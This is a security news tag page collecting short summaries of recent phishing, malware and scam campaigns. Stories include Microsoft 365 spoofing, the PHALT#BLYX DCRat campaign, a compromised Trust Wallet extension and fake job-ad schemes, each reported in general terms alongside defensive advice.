All news with #phishing tag

🔐 Meta says it patched a bug that allowed an external party to mass-request Instagram password reset emails and denies any systems breach after claims that data from more than 17 million accounts was posted online. Malwarebytes warned customers of a 17.5M-account dump containing phone numbers, emails, addresses and Instagram IDs, though not every record includes all fields. Meta told reporters it is not aware of an API incident in 2022 or 2024, and Instagram accounts remain secure. Users should ignore unsolicited reset emails, enable two-factor authentication, and stay alert to phishing and smishing attempts.

🔒 Recorded Future links GRU-affiliated APT28 (aka BlueDelta) to targeted credential-harvesting campaigns in 2025 that hit staff at a Turkish energy and nuclear research agency, a European think tank, and entities in North Macedonia and Uzbekistan. The group used regionally tailored Turkish-language lures and legitimate PDF decoys, deployed spoofed OWA, Google and Sophos VPN pages hosted on services such as Webhook.site, InfinityFree, Byet and ngrok, exfiltrating credentials before redirecting victims to real sites to avoid detection.

🔐 Many security teams rely on click rates to judge phishing risk, but that metric is volatile and often fails to predict real-world harm. The article argues that true maturity is measured by what an attacker can do after gaining mailbox access, not by simulated click statistics. It urges a layered approach—prevention, detection, and especially containment—and highlights Material Security as an example of automated remediation that reduces blast radius without constant manual triage.

🔒 U.S. prosecutors charged an Illinois man with running a phishing operation that targeted nearly 600 women’s Snapchat accounts between May 2020 and February 2021. Kyle Svara allegedly used social engineering to collect emails, phone numbers, and usernames, then impersonated Snap representatives to request access codes and harvest credentials, ultimately accessing at least 59 accounts and downloading private images. He is accused of advertising hacking services on Reddit, directing accomplices to encrypted channels such as Kik, and selling or trading stolen content. Svara faces federal counts including aggravated identity theft, wire fraud, computer fraud, and making false statements related to child pornography, and is scheduled to appear in Boston federal court on February 4.

📱Acronis says a campaign named Boto Cor-de-Rosa uses WhatsApp to spread the Astaroth banking trojan in Brazil. Attackers distribute ZIP archives via messages; extracting them runs a Visual Basic Script that downloads additional components and an MSI installer. A Python-based worm module harvests WhatsApp contacts and automatically forwards malicious archives to propagate. A background banking module monitors browsing to harvest credentials and the malware logs propagation metrics.

📧 Microsoft Threat Intelligence warns attackers are increasingly abusing complex email routing and misconfigured DMARC and SPF policies to make phishing messages appear internal. Campaigns exploit MX records that do not point directly to Microsoft 365, allowing messages with the recipient's address in both To and From fields to bypass filters. Lures include password resets and shared-document notices, and some attacks use Phishing-as-a-Service platforms such as Tycoon 2FA to perform Adversary-in-the-Middle attacks that can defeat MFA. Microsoft recommends strict DMARC reject policies, SPF hard-fails, correct connector configuration, and phishing-resistant MFA like FIDO2.

📧 Microsoft Threat Intelligence warns of a surge in phishing campaigns that exploit misconfigured mail routing and domain spoofing protections to make malicious messages appear internal to Microsoft 365 tenants. Attackers target users with HR- and IT-themed lures to steal credentials, often pairing the technique with phishing-as-a-service kits like Typhoon2FA. The vector depends on tenants whose MX records are not pointed directly at Office 365, bypassing built-in spoof detection. Organizations should correct MX configuration, enforce DMARC and deploy phishing-resistant MFA for privileged roles.

🕵️ The OPCOPRO "Truman Show" operation is a sophisticated, fully synthetic investment scam that relies on social engineering rather than malware. Attackers use legitimate Android and iOS apps from official stores as WebView shells and build AI-generated communities to cultivate trust. Victims are lured via phishing SMS, ads, and Telegram into tightly controlled WhatsApp and Telegram groups where AI-generated "experts" and synthetic peers simulate an institutional-grade trading environment for weeks before requesting money or personal data.

📧 Microsoft’s Threat Intelligence team warns that attackers are increasingly exploiting complex email routing and misconfigured DMARC and SPF policies to make phishing messages appear to come from inside targeted organizations. These campaigns often rely on MX records that route mail through on‑premises servers or third‑party relays before Microsoft 365, which can prevent correct spoof checks. Threat actors deliver lures ranging from password resets to shared documents and use PhaaS platforms such as Tycoon 2FA. Microsoft advises enforcing strict DMARC reject and SPF hard-fail policies, verifying connectors, and adopting phishing-resistant MFA like FIDO2 keys.

🔒 Microsoft warns that threat actors are exploiting misconfigured email routing and lax spoof protections to send phishing messages that appear to originate from an organization’s own domain. The Microsoft Threat Intelligence team says the tactic surged since May 2025 and is commonly deployed via Tycoon 2FA phishing-as-a-service kits. Attacks aim to steal credentials, bypass MFA via AiTM techniques, and enable follow-on fraud or BEC, often using fake invoices, HR notices, or shared-document lures. Organizations should enforce DMARC reject and strict SPF policies, validate third-party connectors, and disable Direct Send if unnecessary.

📧 Phishing actors are exploiting complex mail routing and misconfigured spoof protections to send messages that appear to originate internally, frequently using PhaaS platforms such as Tycoon2FA. Microsoft observed increased use of this vector since May 2025, including nested redirect chains and AiTM techniques to harvest credentials. Tenants with MX records pointed to Office 365 benefit from built-in protections; others must enforce strict SPF hard-fail, DKIM signing, and DMARC reject policies and correctly configure connectors to prevent these spoofing campaigns.

⚠️ Securonix researchers have identified a multi-stage malware campaign, tracked as PHALT#BLYX, that targets hospitality organizations during the holiday season. The attack begins with phishing emails impersonating Booking.com, using urgent, high‑value reservation charges to lure victims to a convincing clone site. Victims are coerced through fake CAPTCHA and simulated BSOD prompts to paste a PowerShell command that downloads a project file executed by MSBuild.exe, culminating in a heavily obfuscated DCRat remote access Trojan. Securonix advises staff training, strict handling of browser‑prompted commands and enhanced monitoring of trusted binaries and process behaviour.

📧 Securonix researchers uncovered PHALT#BLYX, a phishing campaign that uses ClickFix-style lures and counterfeit Booking.com reservation messages to trick hospitality staff into executing commands that pull and run remote code. The landing pages present a fake CAPTCHA then a staged blue screen of death that instructs victims to paste a command into the Windows Run dialog, triggering a PowerShell dropper. That dropper downloads an MSBuild project (v.proj) and invokes MSBuild.exe to configure Defender exclusions, persist in Startup, and retrieve the DCRat remote-access trojan.

🛑 This campaign impersonates Booking.com to redirect hospitality staff to a cloned site that triggers a full-screen fake Windows BSOD. The page instructs victims to paste and run a command that launches PowerShell, compiles a malicious .NET project via MSBuild.exe, and executes a loader. The payload disables Defender exclusions, triggers UAC prompts for elevation, and deploys DCRAT (staxs.exe) which provides remote access and can drop additional tools such as cryptocurrency miners.

📧 Check Point disclosed a large-scale phishing campaign that abused Google Cloud Application Integration to send authentic-looking messages from noreply-application-integration@google[.]com, enabling attackers to bypass SPF and DMARC protections. The emails mimicked routine enterprise notifications to prompt clicks and redirected victims through Google Cloud storage to a fake CAPTCHA and a counterfeit Microsoft login page. Google has blocked the abuse and is implementing further mitigations.

🔎 This post summarizes a cross‑national pattern of LinkedIn job scams in which fake employers and recruiters extract money or credentials from prospective employees. Tactics vary by market: tech‑job baiting in India, referral‑style fraud in Kenya, fake formal roles in Mexico, and credential‑harvesting schemes in Nigeria. The author emphasizes these are employer‑side frauds and distinct from scams where attackers pose as employees to secure remote work.

📧 Silver Fox is targeting Indian users with income tax-themed phishing emails that deliver the modular remote-access trojan ValleyRAT. The campaign uses decoy PDFs that redirect victims to a domain hosting a ZIP archive containing an NSIS installer which sideloads a rogue libexpat.dll alongside a legitimate thunder.exe. The loader disables Windows Update, performs anti-analysis checks, and injects the RAT into explorer.exe to establish persistent, low-noise access.

💰Fraudulent emails appearing to come from a Grubhub subdomain promised a tenfold bitcoin payout to recipients who transferred funds to a specified wallet, urging action within a 30-minute window. Messages were sent from addresses on b.grubhub.com and in some cases included recipients' names, increasing their apparent legitimacy. Grubhub says it isolated the issue, investigated the incident, and is taking steps to prevent recurrence while technical details remain undisclosed.

🔒 Several users reported funds drained from the Trust Wallet Chrome extension after a compromised update (v2.68.0) released on December 24. Researchers found malicious, obfuscated code in a bundled file (4482.js) that exfiltrated seed phrases to api.metrics-trustwallet[.]com, and attackers also deployed a phishing site (fix-trustwallet[.]com) soliciting recovery seeds. Trust Wallet published a patched v2.69, urged users to disable or update the extension, and advised anyone with exposed seeds to move assets to new wallets and contact support.

🔍 Group-IB has uncovered a coordinated campaign of professionally produced fake job ads targeting MENA remote workers, exploiting the region's shift to remote roles. Ads on Facebook, Instagram and TikTok impersonate banks, e-commerce platforms and government bodies, then move conversations to WhatsApp and Telegram to harvest personal and financial data. Scammers promise quick earnings, use localized language and currencies, and reuse scripts and fake sites to scale and evade detection. Individuals are advised to verify employers, avoid sharing sensitive information and report suspicious listings.